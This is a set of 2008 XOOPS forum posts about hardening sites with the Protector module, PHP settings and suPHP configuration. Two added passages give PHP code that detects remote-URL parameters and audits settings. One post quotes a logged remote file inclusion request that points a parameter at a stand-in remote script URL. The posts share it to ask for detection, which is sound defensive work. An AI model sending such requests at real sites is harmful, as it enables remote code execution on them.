81
peterr
Re: Protector 3.0
  • 2008/5/27 5:15

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Quote:

vwood wrote:
I had difficulty installing Protector using the instructions at
https://xoops.org/modules/newbb/viewtopic.php?post_id=254269#forumpost254269


If you follow the documentation done by "MadFish", then you won't have any problems..

PDF version
Open document version
Word version

Quote:

vwood wrote:
I now have a trust path above the web site path.


The trust path should be outside the web root path. If your definition for it is ..

define('XOOPS_TRUST_PATH', '/home/www/xxxxxxxxx');


then it should be something like ..

define('XOOPS_TRUST_PATH', '/home/username/xxxxxxxxx');


HTH
NO to the Microsoft Office format as an ISO standard.
Sign the petition



82
peterr
Re: sub-domains for modules
  • 2008/5/10 7:52

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


You may wish to consider modifying mainfile.php, to look for the subdomains. There are various PHP variables that could be used, as they are changed when a subdomain is used. For example ..

If I understand how you have the subdomain setup with Apache, then these PHP variables should be present ..

Quote:

_SERVER["DOCUMENT_ROOT"] /home/username/public_html/modules/sub
_SERVER["HTTP_HOST"] sub.domain.com
_SERVER["SERVER_NAME"] sub.domain.com
_ENV["DOCUMENT_ROOT"] /home/username/public_html/modules/sub
_ENV["HTTP_HOST"] sub.domain.com
_ENV["SERVER_NAME"] sub.domain.com


Some possible mainfile.php changes ..

// HTTP_HOST comes from the client's Host header, so it is compared to a fixed name
if ($_SERVER["HTTP_HOST"] == 'sub.domain.com') {
    define('XOOPS_ROOT_PATH', '/home/username/public_html/modules/sub');
    define('XOOPS_URL', 'http://sub.domain.com');
} else {
    define('XOOPS_ROOT_PATH', '/home/username/public_html');
    define('XOOPS_URL', 'http://domain.com');
}


but, no doubt you have already tried that, or there are other implications ??
NO to the Microsoft Office format as an ISO standard.
Sign the petition



83
peterr
Re: sub-domains for modules
  • 2008/5/10 6:52

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Quote:

tzvook wrote:
I'm trying to lead my subdomains into XOOPS modules, but when using the "sub" address ( IE: "the-module.my-site.com") all I get is this:
Selected module does not exist!

though the address is leading to "my-site.com/modules/the-module"


It seems to be going against the standard 'structure' of sub-domains ??

If there is a subdomain called http://the-module.my-site.com , then the web root is http://my-site.com , and the path structure will be something like ..

/home/username/public_html/ for web root
/home/username/public_html/the-module/ for subdomain

and the path 'modules', for std XOOPS sites will be ..

/home/username/public_html/modules/

which is the same level as the subdomain, unfortunately.

If you can (somehow) point your subdomain to ..

/home/username/public_html/modules/the-module/

that might work, but that is not how Apache, etc, views a subdomain.
NO to the Microsoft Office format as an ISO standard.
Sign the petition



84
peterr
Re: Protector - feature request
  • 2008/5/9 12:42

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Thanks, I have PM'd the author of the Protector documentation, who seems to be a regular poster on the Peak website.
NO to the Microsoft Office format as an ISO standard.
Sign the petition



85
peterr
Protector - feature request
  • 2008/5/9 12:09

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Have been using Protector for a while, and would like to see it "trap" any HTTP request, that is obviously trying to parse a script from a remote site. These do not always result in a 403 or a 404 either, depending upon server security and configuration.

The type of requests are of the format:

Quote:

208.113.196.15 - - [09/May/2008:04:54:57 +1000] "GET /modules/xhld0/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://example.com/modules/test.txt??? HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"


(domain name of remote url changed in the above, for obvious reasons).

returns a 302, and often other attempts at remote script parsing, return a 200, so XOOPS thinks that "all is well", despite the fact that Protector is installed.

I don't think the 'blanket approach' of setting "allow_url_fopen" value to off is suitable for all sites. Turning this option off is recommended when using Protector, however server setup/config., and especially PHP version, has a bearing on whether or not this setting should really be off.

See these discussions:

http://foundationphp.com/phpsolutions/updates.php
http://www.webmasterworld.com/forum88/10940.htm

Determining if the string 'http' was being parsed, could be something like ..

$pos = strpos(strtolower($_SERVER['REQUEST_URI']), 'http:');


As the version of PHP has some bearing on the need to have the setting "allow_url_fopen" value to off, the PHP function phpversion() could be utilised.

My 0.001 cents worth anyway.
NO to the Microsoft Office format as an ISO standard.
Sign the petition
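
An added example, not part of the original post and not Protector's own code: one way to implement the check suggested above, inspecting decoded parameter values instead of the raw REQUEST_URI and covering https and ftp as well as http. The function name find_remote_url_params and the scheme list are assumptions; the first query string is taken from the log line quoted in the post, the other two are constructed.

```php
<?php
// Added example: flag request parameters whose value starts like a remote URL.
// find_remote_url_params() is a hypothetical helper, not a Protector function.
function find_remote_url_params(string $queryString): array
{
    $hits = [];
    // parse_str() URL-decodes names and values and expands a[b]=c into arrays,
    // so percent-encoded schemes and bracketed names are seen in decoded form.
    parse_str($queryString, $params);

    $walk = function ($value, string $name) use (&$walk, &$hits) {
        if (is_array($value)) {
            foreach ($value as $k => $v) {
                $walk($v, $name . '[' . $k . ']');
            }
            return;
        }
        // Match a scheme at the start of the value, case-insensitively.
        // preg_match() returns 1 or 0, avoiding the strpos() 0-versus-false trap.
        if (preg_match('#^\s*(https?|ftps?):#i', (string) $value, $m)) {
            $hits[$name] = strtolower($m[1]);
        }
    };
    foreach ($params as $name => $value) {
        $walk($value, (string) $name);
    }
    return $hits;
}

// Query string from the log line quoted in the post.
$fromLog = '_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1'
    . '&GLOBALS=&mosConfig_absolute_path=http://example.com/modules/test.txt???';
print_r(find_remote_url_params($fromLog));
// Constructed: scheme percent-encoded and upper-cased.
print_r(find_remote_url_params('page=%48TTP%3A%2F%2Fexample.com%2Fx.txt'));
// Constructed: a value that only mentions a URL later in its text.
print_r(find_remote_url_params('comment=see+http://example.com'));
```

Anchoring the match at the start of each value is a design choice made here to avoid flagging ordinary text that contains a link; a request that matches can then be logged or rejected regardless of the status code the server would otherwise return.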



86
peterr
Re: XOOPS security and php settings
  • 2008/5/3 7:17

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Quote:

hervet wrote:
It seems ok for me.
Don't forget to secure your database too.


Thanks. Yes, the db is okay, I use Protector.

It was going to be way too much to define the php values in a php.ini, because we would need one in every path that had, at least an 'include' or 'require' in the php code. I did a quick glance, and counted no less than 78 paths that would need a modified php file, ...... no thanks, what a maintenance nightmare.

Fortunately, the server admin person was kind enough to modify the server wide php settings for me, as _most_ of those required by XOOPS and Protector are set correctly anyway.

The only one that isn't set (off) is allow_url_fopen, however the point raised in the first post is an issue, that is, the real need to have this set off. Also, server security is such that people who are trying exploits on the site, and trying to pass a remote file (by including "http" and the filename in the uri), are getting nowhere at all, they get a 403 or a 404.

In the process of reading some docs on suPHP, we found out that in php 5.3 , the use of .htaccess will again be available, at least, that's the way I read it.
NO to the Microsoft Office format as an ISO standard.
Sign the petition



87
peterr
Re: BIG thanks to Gijoe
  • 2008/5/3 6:58

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


It would be good if Protector was 'part' of the XOOPS core.

I installed it after someone tried an SQL injection. It's a great module. Also, I have found server security setup has a big part to play in attempted exploits; a lot depends on how tight security is, if the browser is returned a 403 or 404 on uri's that have "http" in them (trying to pass a remote file).

Yes, Gijoe should be thanked by many people.
NO to the Microsoft Office format as an ISO standard.
Sign the petition



88
peterr
Re: Apache2, php5 and internal server errors
  • 2008/4/24 13:17

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Or, another alternative ..

In the .htaccess file of the web root path ..

suPHP_ConfigPath /home/username


Then create a file /home/username/php.ini (take a copy of the currently used php.ini configuration file).

Now you have a local php.ini file where you can set your directives.

Or, this should work also ..

suPHP_ConfigPath /home/username/public_html
<Files php.ini>
order allow,deny
deny from all
</Files>


and your php.ini is placed in the web root path.
NO to the Microsoft Office format as an ISO standard.
Sign the petition



89
peterr
XOOPS security and php settings
  • 2008/4/24 1:29

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


The server environment is

Quote:

Apache version 2.0.63
PERL version 5.8.8
PHP version 5.2.5
MySQL version 5.0.45-community


There may be some official XOOPS guidelines on security, however I could not find it. In particular, what php settings are recommended ?

This is what is currently used in the .htaccess of an XOOPS site.

# XOOPS security measures
php_flag session.use_only_cookies on
php_flag session.use_trans_sid off
# Protector module
php_flag register_globals off
php_flag allow_url_fopen off
# php errors
php_value display_errors 0
php_value log_errors 1
php_value error_log ../phperrorspathname/phperrorlogname.txt


Please advise of any changes/additions. Please keep in mind, that since PHP 5.1.0 , the 'need' for allow_url_fopen to be "off" may be redundant, by the addition of a new directive, called allow_url_include - (see http://www.webmasterworld.com/forum88/10940.htm)

Some default configuration values at http://www.php.net/manual/en/filesystem.configuration.php
NO to the Microsoft Office format as an ISO standard.
Sign the petition
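
An added example, not part of the original post or of XOOPS: a script that reports the values PHP is actually running with for the directives in the .htaccess above, which is useful when php_flag lines may not be applied (for instance under suPHP, as discussed elsewhere in this thread). The helper name audit_php_settings and the inclusion of allow_url_include in the list are assumptions.

```php
<?php
// Added example: compare effective PHP settings with the values wanted by the
// .htaccess in the post. audit_php_settings() is a hypothetical helper.
function audit_php_settings(array $expected): array
{
    $report = [];
    foreach ($expected as $directive => $wanted) {
        $raw = ini_get($directive);
        if ($raw === false) {
            // Directive unknown to this build, e.g. register_globals, which
            // was removed from later PHP releases.
            $report[$directive] = 'not present in PHP ' . phpversion();
            continue;
        }
        // "1"/"On" become true, ""/"0"/"Off" become false, anything else
        // (such as display_errors = stderr) becomes null and is reported.
        $actual = filter_var($raw, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
        $report[$directive] = ($actual === $wanted)
            ? 'ok'
            : 'MISMATCH: effective value is ' . var_export($raw, true);
    }
    return $report;
}

$expected = [
    'session.use_only_cookies' => true,
    'session.use_trans_sid'    => false,
    'register_globals'         => false,
    'allow_url_fopen'          => false,
    'allow_url_include'        => false, // assumption: not in the posted file
    'display_errors'           => false,
    'log_errors'               => true,
];

foreach (audit_php_settings($expected) as $directive => $status) {
    printf("%-26s %s\n", $directive, $status);
}
```

Run it through the web server rather than the command line, since the CLI usually loads a different configuration from the one serving the site.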



90
peterr
Re: Apache2, php5 and internal server errors
  • 2008/4/24 1:01

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


I have since found out that suPHP is running, and there is a method to use .htaccess , and therefore, no doubt, add the php_flag settings.

The following from suPHP - FAQ ..

Quote:

Can I use the php_value directives in .htaccess files with suPHP?

suPHP does not support the php_value/php_admin_value directive known by mod_php to parse configuration options to scripts for certain virtual hosts or directories. However there is a PECL extension named htscanner that can be used with PHP CGI (called by suPHP) to parse such options being present in .htaccess files. Be sure to take a look at the README file provided with the htscanner distribution on how to make Apache ignore the php_value directives in .htaccess files instead of throwing an error.
NO to the Microsoft Office format as an ISO standard.
Sign the petition



